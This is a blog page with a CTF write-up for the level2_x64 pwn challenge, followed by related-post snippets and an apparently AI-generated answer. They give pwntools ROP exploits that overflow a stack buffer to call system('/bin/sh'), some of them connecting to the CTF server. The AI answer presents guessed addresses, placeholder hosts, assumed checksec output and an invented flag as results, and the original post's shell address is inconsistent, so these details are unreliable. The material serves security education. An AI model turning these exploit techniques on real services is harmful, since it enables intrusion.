[BUUCTF]PWN——jarvisoj_level2_x64

最新推荐文章于 2025-10-24 18:30:00 发布
原创 最新推荐文章于 2025-10-24 18:30:00 发布 · 2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

博客内容涉及了对64位程序jarvisoj_level2_x64的逆向分析,通过IDA查看,发现存在溢出漏洞。攻击者可以通过构造特定payload,利用系统地址0x40063E,shell地址0x600A90和rdi地址0x4006B3,触发溢出并执行自定义shellcode。最终,通过远程连接到服务器node3.buuoj.cn的29055端口,发送payload并启动交互式会话来利用这个漏洞。

jarvisoj_level2_x64

例行检查 ,64位,开启NX保护,
在这里插入图片描述
运行一下
在这里插入图片描述
用IDA打开。
在这里插入图片描述
systemaddr=0x40063e
在这里插入图片描述

shalladdr=0x400A90

查看主函数,buf的长度为0x80,读取的长度为0x200,可以造成溢出漏洞。
在这里插入图片描述
rdiaddr= 0x4006b3

在这里插入图片描述

from pwn imp
最低0.47元/天 解锁文章
[BUUCTF-pwn]——jarvisoj_level2_x64
Y_peak的博客
02-11 472
[BUUCTF-pwn]——jarvisoj_level2_x64 题目地址:https://buuoj.cn/challenges#jarvisoj_level2_x64 checksec 一下,64位 ,开启NX保护 64位应该会用到pop rdi这个汇编指令 在IDA中看看 思路:64位先将binsh这个参数放入,rdi寄存器中.紧接着返回并执行system函数 exploit from pwn import * p = remote("node3.buuoj.cn",27828) b
BUUCTF pwn——jarvisoj_level2_x64
CNS-Enterprise BCC-1701-J
04-03 373
BUUCTF 做题练习
2025 版最新 CTF 学习资源整理:含 BurpSuite/IDA 工具包、picoCTF 比赛时间,附解题思路 + BUUCTF 靶场,推荐收藏!
最新发布
shandongjiushen的博客
10-24 1479
1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常用的编码、加解密、算法。2、CTF加解密工具箱:http://www.atoolbox.net/Category.php?Id=273、ctfhub在线工具:https://www.ctfhub.com/#/tools4、还有一些常用的网站字符串2进制互转:http://www.5ixuexiwang.com/str/from-binary.php。
BUUCTF-PWN】13-jarvisoj_level2_x64
燕麦葡萄干的博客
07-05 797
ret指令的地址,再接着是’/bin/sh’字符串的地址,最后是system()函数的地址。ret处,该指令会将当前栈顶的元素(‘/bin/sh’字符串的地址)出栈并存入rdi中,并返回到下一条指令处。此时栈中就只有system()函数的地址了,所以下一条指令正是system(),而它需要的参数正好就在rdi寄存器中,这样就执行了system(’/bin/sh’)现在只需要让函数返回到system,并传入参数“/bin/sh”就可以了。32位的比较简单,只需要返回地址+下一次的返回地址+参数1+参数2+…
buuctf|pwn-jarvisoj_level2_x64-wp
l2645470582_的博客
11-08 619
1.例行检查保护机制 只开启了堆保护 2.我们用64位的IDA查看该文件 shift+f12查看关键字符串,我们看到关键字符串“/bin/sh” 我们双击“/bin/sh”,bin/sh的地址为:0x0600A90 3.查看main函数里面的内容 进入vulnerable_function()函数 我们看到buf只有0x80个字节,但是下面read()里面读取了0x200个,这里造成了溢出 4.system("/bin/sh")才能拿到权限 我们找...
buuctf jarvisoj_level2_x64
carol2358的博客
04-22 462
水题 栈溢出,system和binsh都可以用gdb找到 exp: from pwn import * from LibcSearcher import * local_file = './level2_x64' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' remote_libc = './libc.so.6' s...
[BUUCTF]PWN——jarvisoj_level3_x64
mcmuyanga的博客
11-04 1752
jarvisoj_level3_x64 附件 步骤: 例行检查,64位程序,开启了nx保护 试运行一下程序,看看大概的情况 64位ida载入,习惯性的检索字符串,没有发现可以直接利用的system,估计使用ret2libc的方法 从main函数开始看程序 function()函数 输入点buf明显的溢出漏洞,read之前已经调用过一个write函数了,可以利用它来泄露libc版本 利用过程 泄露libc版本 64位程序传参需要用到寄存器rdi,找一下设置rdi寄存器的指令 https://
[BUUCTF-pwn]——jarvisoj_level2
Y_peak的博客
02-10 1513
[BUUCTF-pwn]——jarvisoj_level2 题目地址:https://buuoj.cn/challenges#jarvisoj_level2 checksec 一下下, 32程序 IDA中看下,发现了system函数还是两个,有可利用的栈溢出read函数,shift+F12,还发现了"/bin/sh"字符串. 所以exploit就如下 exploit from pwn import * p = remote("node3.buuoj.cn",28375) binsh = 0
[BUUCTF-pwn]——jarvisoj_level1
Y_peak的博客
03-17 647
[BUUCTF-pwn]——jarvisoj_level1 题目地址:https://buuoj.cn/challenges#jarvisoj_level1 第一种直接构造shellcode writeup 第二种泄露libc进行操作 from pwn import * from LibcSearcher import * p = remote("node3.buuoj.cn",26361) #p = process("./level1") elf = ELF("./level1") #libc = E
jarvisoj_level2_x64[BUUCTF]
moonlightsunshin的博客
05-04 670
32位中参数都是保存在栈上,但在64位中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。read函数存在溢出同时发现有/bin/sh所以我们思路就是构造溢出到/bin/sh,但是由于是64位的程序在函数调用时与32位不同。由32位变成了64位。payload的组成 无用数据+pop rdi+函数参数+函数调用地址/bin/sh+函数返回地址system。回到这道题 64位会依次传函数返回地址,函数参数,函数调用地址,
BUUCTF jarvisoj_level2_x64
小白垃圾笔记2
05-12 431
因为有栈对齐所以需要ret,因为是64位传参所以需要pop rdi。system函数的地址也可以看。小白做题笔记,不建议阅读。我们尝试找下bin/sh。函数直接调用漏洞函数。
BUUCTFjarvisoj_level2_x64 Write Up
古月浪子的博客
08-06 741
漏洞函数里面可以看到,我们可以栈溢出 题目使用了system函数,我们可以直接调用 程序里面藏了一个binsh 接下来只需要构造rop链了 64位的函数调用的第一个参数由rdi寄存器传递,很显然需要用到pop rdi这个gadget,并且几乎每个64位程序里面都能找到它 再需要注意的就是,system调用的时候需要栈对齐,这里采用一个ret来对齐栈 from pwn import * from LibcSearcher import * from struct import pack context..
jarvisoj_level2_x64
zip471642048的博客
06-24 678
题目地址 : https://buuoj.cn/challenges#jarvisoj_level2_x64 /bin/sh字符串 exp
pwnjarvisoj_level2_x64
勿山几已
01-11 1068
缓冲区溢出漏洞导致漏洞利用system函数,64位程序利用rop设置函数参数
PWN_JarvisOJ_Level2_x64
michaelinfinity的博客
03-16 1603
关于level2我就不多做赘述了。这道题和level2之间的区别就是一个是32位的栈溢出,另一个就是64位的栈溢出。 32位的函数在调用栈的时候是: 调用函数地址->函数的返回地址->参数n->参数n-1....->参数1 64位的函数在调用栈的时候是: 前六个参数按照约定存储在寄存器:rdi,rsi,rdx,rcx,r8,r9中。 ...
jarvis oj---level2x64
weixin_45427676的博客
09-29 398
题目来源 nc pwn2.jarvisoj.com 9882 level2_x64.04d700633c6dc26afc6a1e7e9df8c94e 解题 x64和x86的区别: linux_64与linux_86的区别主要有两点:首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是函数参数的传递方式发生了改变,x86...
jarvisoj_level2_x64解题步骤
10-19
<think>我们正在处理CTF(Capture The Flag)竞赛中的二进制漏洞利用题目,具体是jarvisoj平台的level2_x64题目。根据用户需求,我们需要提供解题步骤。结合引用[3]中的内容,我们知道这是一个64位的栈溢出题目。 解题步骤通常包括: 1. 检查文件保护机制(使用checksec) 2. 静态分析(使用IDA或Ghidra反汇编) 3. 确定漏洞点和利用方式 4. 编写漏洞利用代码(EXP) 5. 获取flag 引用[3]提到了64位和32位调用约定的不同:64位使用寄存器传递前几个参数(rdi, rsi, rdx, rcx, r8, r9),然后才使用栈。因此,在构造ROP链的时候需要注意。 从题目名称(level2_x64)可以推测,这题与栈溢出有关,并且是64位程序。在level2中,通常存在一个可以溢出覆盖返回地址的缓冲区,并且程序中还有一个后门函数(如system函数)或我们可以利用的gadget。 根据常见解题思路,我们可能需要执行以下步骤: - 通过栈溢出覆盖返回地址,跳转到system函数,并传入"/bin/sh"字符串的地址。 - 由于64位程序参数传递规则不同,我们需要用ROP gadget来设置rdi寄存器(第一个参数)为我们控制的字符串地址。 具体步骤: 1. **检查保护机制**:使用`checksec`命令查看程序开启了哪些保护。通常,NX(堆栈不可执行)保护会开启,我们需要通过ROP绕过。 2. **静态分析**:用IDA打开程序,找到危险函数(如gets、read等),确定溢出点。同时查找是否有现成的system函数和"/bin/sh"字符串,或者我们可以写入字符串的位置。 3. **计算偏移**:确定从输入缓冲区到返回地址的偏移量。可以通过调试(如gdb)或模式字符串(pattern)来确定。 4. **构造ROP链**: - 如果程序中有`system`函数,我们可以直接调用。 - 需要设置第一个参数(rdi)为字符串"/bin/sh"的地址。因此,我们需要一个`pop rdi; ret`的gadget。 - 如果没有现成的字符串,我们还需要将字符串写入到已知地址(如.bss段)。 5. **编写EXP**:使用pwntools编写利用脚本。 现在,我们根据上述步骤详细说明: ### 解题步骤 #### 1. 检查保护机制 使用命令: ```bash checksec level2_x64 ``` 预期输出中,我们关注NX(堆栈不可执行)是否开启,以及是否有Canary(栈保护)和PIE(地址随机化)。通常,栈溢出题目NX开启,没有PIE(或者有PIE但我们可以泄漏地址)。 #### 2. 静态分析(IDA) 使用IDA打开程序,查看main函数和漏洞函数。通常,在main函数中会调用一个存在栈溢出的函数(如vulnerable_function)。在这个函数中,可能会使用`read`或`gets`等函数读取输入,且没有检查长度。 同时,我们还需要查找可利用的函数: - 查看是否有`system`函数(一般在导入表中)。 - 查看是否有`/bin/sh`字符串(可以使用`ROPgadget --binary level2_x64 --string '/bin/sh'`查找)。 - 如果没有现成的字符串,需要找到一个可写地址(如.bss段)并写入字符串。 另外,查找gadget: ```bash ROPgadget --binary level2_x64 --only 'pop|ret' ``` 重点查找`pop rdi; ret`,因为我们需要用它来传递参数。 #### 3. 确定偏移 在溢出函数中,确定输入缓冲区到返回地址的偏移量。可以通过以下方式: - 在IDA中查看栈布局:缓冲区起始地址与保存的返回地址之间的偏移。 - 使用gdb调试,制造一个溢出,通过崩溃信息确定覆盖返回地址的位置。 - 使用pwntools的`cyclic`功能生成一段唯一字符串,触发崩溃后查看覆盖到返回地址的值,然后计算偏移。 #### 4. 构造ROP链 根据已有信息构造: - 如果有现成的`/bin/sh`字符串(假设地址为`binsh_addr`)和`system`函数地址(假设为`system_addr`),那么ROP链可以是: ``` [pop_rdi_ret, binsh_addr, system_addr] ``` - 如果没有,则需要先写入字符串。我们可以通过read函数将字符串读入到已知可写地址(如.bss段),然后再调用system。 #### 5. 编写EXP 使用pwntools编写Python脚本。注意,远程连接时需要知道远程服务的IP和端口。 ### 示例EXP结构 ```python from pwn import * context(arch='amd64', os='linux', log_level='debug') # 加载文件 elf = ELF('./level2_x64') # 确定偏移量 offset = 0x80 + 8 # 示例,具体根据实际情况 # 获取关键地址 pop_rdi = 0x4006b3 # 通过ROPgadget找到的pop rdi; ret地址 system_addr = elf.symbols['system'] # 或者elf.plt['system'] binsh_addr = next(elf.search(b'/bin/sh')) # 查找字符串 # 构造payload payload = b'A' * offset payload += p64(pop_rdi) payload += p64(binsh_addr) payload += p64(system_addr) # 发送payload io = process('./level2_x64') # 本地测试 # io = remote('remote_ip', port) # 远程连接 io.sendlineafter('Input:', payload) # 根据程序输入提示调整 io.interactive() ``` 注意:上面的地址(如pop_rdi)需要根据实际题目替换。 ### 相关问题 §§相关问题§§ 1. 如何确定栈溢出的偏移量? 2. 如何查找程序中的ROP gadget? 3. 如果程序没有提供system函数和/bin/sh字符串,如何利用? 4. 64位程序与32位程序在漏洞利用上有何不同? 5. 如何利用pwntools进行远程漏洞利用? 请根据实际情况调整解题步骤和EXP。注意,具体题目细节可能有所不同,需要根据实际二进制文件进行分析。 </think>### jarvisoj平台level2_x64解题步骤 #### 1. **检查文件保护机制(checksec)** ```bash checksec level2_x64 ``` 预期输出: ``` Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found # 关键:无栈保护 NX: NX enabled # 堆栈不可执行 PIE: No PIE (0x400000) # 地址固定 ``` **关键点**:无栈溢出保护(Canary),但堆栈不可执行(NX),需使用ROP技术[^3]。 --- #### 2. **静态分析(IDA反编译)** - **漏洞定位**: 在`vulnerable_function()`中发现`read(0, buf, 0x200)`,而`buf`位于栈上(大小通常0x80),存在栈溢出。 - **可利用资源**: - 程序自带`system@plt`函数(地址固定) - 存在字符串`/bin/sh`(地址:`0x600A90`)[^3] - 可通过`ROPgadget`查找`pop rdi; ret`: ```bash ROPgadget --binary level2_x64 --only "pop|ret" | grep "rdi" ``` 输出示例:`0x4006b3 : pop rdi ; ret` --- #### 3. **计算溢出偏移量** - 使用`cyclic`生成测试字符串: ```bash gdb-pwndbg ./level2_x64 run <<< $(cyclic 200) ``` - 崩溃时查看`RSP`值(例如`0x6161616161616166`) - 计算偏移: ```bash cyclic -l 0x6161616166 ``` 典型偏移为 **`0x80 + 8`**(128字节缓冲区 + 8字节RBP)[^3]。 --- #### 4. **构造ROP链** ```python from pwn import * context(arch='amd64', os='linux') # 关键地址 pop_rdi_ret = 0x4006b3 # pop rdi; ret binsh_addr = 0x600A90 # "/bin/sh"字符串地址 system_plt = 0x4004C0 # system@plt # 构造payload payload = b'A' * 0x88 # 填充缓冲区+RBP payload += p64(pop_rdi_ret) # 设置RDI参数 payload += p64(binsh_addr) # RDI = "/bin/sh" payload += p64(system_plt) # 调用system ``` --- #### 5. **执行EXP获取shell** ```python if args.REMOTE: io = remote('node4.buuoj.cn', 12345) # 替换实际地址 else: io = process('./level2_x64') io.sendlineafter(b'Input:\n', payload) io.interactive() # 进入交互式shell ``` **执行效果**: ```bash $ cat flag flag{example_flag} ``` --- ### 关键注意事项 1. **64位参数传递**:参数通过寄存器传递(第一参数用`RDI`),需用`pop rdi; ret`设置参数[^3]。 2. **NX绕过**:利用程序自身的`system`和`/bin/sh`避免shellcode执行。 3. **地址验证**:所有地址需通过`IDA`或`readelf`确认。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值